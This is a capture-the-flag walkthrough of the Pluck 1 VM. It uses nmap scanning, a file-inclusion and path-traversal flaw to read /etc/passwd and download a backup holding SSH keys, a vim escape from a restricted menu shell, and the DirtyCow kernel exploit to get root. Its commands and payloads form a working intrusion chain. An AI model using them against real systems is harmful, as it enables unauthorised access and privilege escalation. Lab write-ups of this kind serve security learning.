Pluck1 CTF VM Walkthrough

Today I’m trying to own the Pluck 1 CTF VM

I started looking what was open:

root@pss:~/ctf/pluck# nmap -sV 192.168.1.115 -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-23 17:52 ART
Nmap scan report for 192.168.1.115
Host is up (0.074s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.50 seconds

As most CTFs. port 80 is the first place to look for a first clue.

http landing

The source code didn’t reaveal anything interesting but the URLs did:

Let me try something.. If I get the URL http://192.168.1.115/index.php?page=contact.php and that page param is loading a file called contact.php, I should also be able to hit http://192.168.1.115/contact.php and hit the same page. Let’s take a look….

OK!! It worked! So I only lost the CSS style that was inherited from the index.php page.

I also tested that it includes not only PHP files, but also any file in the server, like http://192.168.1.115/index.php?page=js/jquery.min.js which I knew it was there because of looking the landing page source.

JQuery fetched

Let’s try yo get to the / directory, I’m not sure how many folders we will need to get back, but we know from there we can get access to the server config file, normally at /etc/apache2/apache2.conf

Apache2conf

By looking the source code, it’s more human friendly.

Apache2conf

Eeeeasy, let’s get shadow! No shadow nor shadow- but passwd was there:

passwd file

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Ok, so we have root and several usernames to try:

root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu

The problem is that we have no passwords for them.

There is another user that called my attention:

backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Let’s try to fetch that backup script file.

Script

The backup was pointing to a tar file, so let’s download it!

root@pss:~/ctf/pluck# wget http://192.168.1.115/index.php?page=../../../backups/backup.tar
--2017-03-23 18:55:00--  http://192.168.1.115/index.php?page=../../../backups/backup.tar
Connecting to 192.168.1.115:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.php?page=..%2F..%2F..%2Fbackups%2Fbackup.tar.1’

e=..%2F..%2F..%2Fbackups%2     [                                <=>    ] 896.15M  --.-KB/s               ^C

root@pss:~/ctf/pluck# mv index.php\?page\=..%2F..%2F..%2Fbackups%2Fbackup.tar.1 backup.tar.1
root@pss:~/ctf/pluck# vim backup.tar.1
root@pss:~/ctf/pluck# mv backup.tar.1 backup.tar
root@pss:~/ctf/pluck# tar -xvf backup.tar 
home/
home/bob/
home/bob/.bashrc
home/bob/.sudo_as_admin_successful
home/bob/.profile
home/bob/.bash_logout
home/paul/
home/paul/keys/
home/paul/keys/id_key3.pub
home/paul/keys/id_key2.pub
home/paul/keys/id_key2
home/paul/keys/id_key4.pub
home/paul/keys/id_key5.pub
home/paul/keys/id_key6
home/paul/keys/id_key1
home/paul/keys/id_key5
home/paul/keys/id_key1.pub
home/paul/keys/id_key6.pub
home/paul/keys/id_key4
home/paul/keys/id_key3
home/paul/.bashrc
home/paul/.profile
home/paul/.bash_logout
home/peter/
home/peter/.bashrc
home/peter/.profile
home/peter/.bash_logout
var/www/html/
var/www/html/fonts/
var/www/html/fonts/glyphicons-halflings-regular.svg
var/www/html/fonts/glyphicons-halflings-regular.woff2
var/www/html/fonts/glyphicons-halflings-regular.ttf
var/www/html/fonts/glyphicons-halflings-regular.woff
var/www/html/fonts/glyphicons-halflings-regular.eot
var/www/html/about.php
var/www/html/index.php

By looking the tar contents closely, only paul seems to have a way in with some of his keys. So let’s try them.

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key1 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key2 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key3 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115

The fourth was the one! It was showing this pdmenu binary which allowed me to edit a file, opening vim.

edit file

Then, from vim, you could run:

:set shell=/bin/bash
:shell

This gave me a shell

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115
Last login: Fri Mar 24 00:36:38 2017 from 192.168.1.38

paul@pluck:~$ whoami
paul
paul@pluck:~$ 

I did a search looking for files with the SUID

paul@pluck:~$ find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

Searched exploits and found the best one to be DirtyCow, that exploits a linux kernel vulnerability. So I checked If I had gcc installed

paul@pluck:~$ gcc --version
gcc (Ubuntu 6.2.0-5ubuntu12) 6.2.0 20161005
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Then I got the dirty cow exploit

paul@pluck:~$ wget https://exploit-db.com/download/40616
--2017-03-24 01:41:18--  https://exploit-db.com/download/40616
Resolving exploit-db.com (exploit-db.com)... 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4965 (4.8K) [application/txt]
Saving to: ‘40616’

40616               100%[================>]   4.85K  --.-KB/s    in 0s      

2017-03-24 01:41:20 (612 MB/s) - ‘40616’ saved [4965/4965]

paul@pluck:~$ mv 40616 cow.c
paul@pluck:~$ vim cow.c 
paul@pluck:~$ gcc cow.c -o cow -pthread
cow.c: In function ‘procselfmemThread’:
cow.c:99:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion]
         lseek(f,map,SEEK_SET);
                 ^~~
In file included from cow.c:28:0:
/usr/include/unistd.h:337:16: note: expected ‘__off_t {aka long int}’ but argument is of type ‘void *’
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^~~~~
cow.c: In function ‘main’:
cow.c:136:5: warning: implicit declaration of function ‘asprintf’ [-Wimplicit-function-declaration]
     asprintf(&backup, "cp %s /tmp/bak", suid_binary);
     ^~~~~~~~
cow.c:140:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
     fstat(f,&st);
     ^~~~~
cow.c:142:30: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘__off_t {aka long int}’ [-Wformat=]
     printf("Size of binary: %d\n", st.st_size);
            
                              ^

One of the big problems I had was that when running the exploit, I had only 1~2 seconds to operate before the CTF VM got completely freezed.

Researching I found this comment about running echo 0 > /proc/sys/vm/dirty_writeback_centisecs to make the dirtycow exploit work properly.

So I copied, and as soon as I got shell, I pasted and ran the command. Then, was just going to the root folder to find the flag.

paul@pluck:~$ ./cow 
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 54256
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@pluck:/home/paul# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@pluck:/home/paul# cd /root
root@pluck:/root# ls
flag.txt
root@pluck:/root# cat flag.txt 

Congratulations you found the flag

---------------------------------------

######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

root@pluck:/root# 


Thats all falks!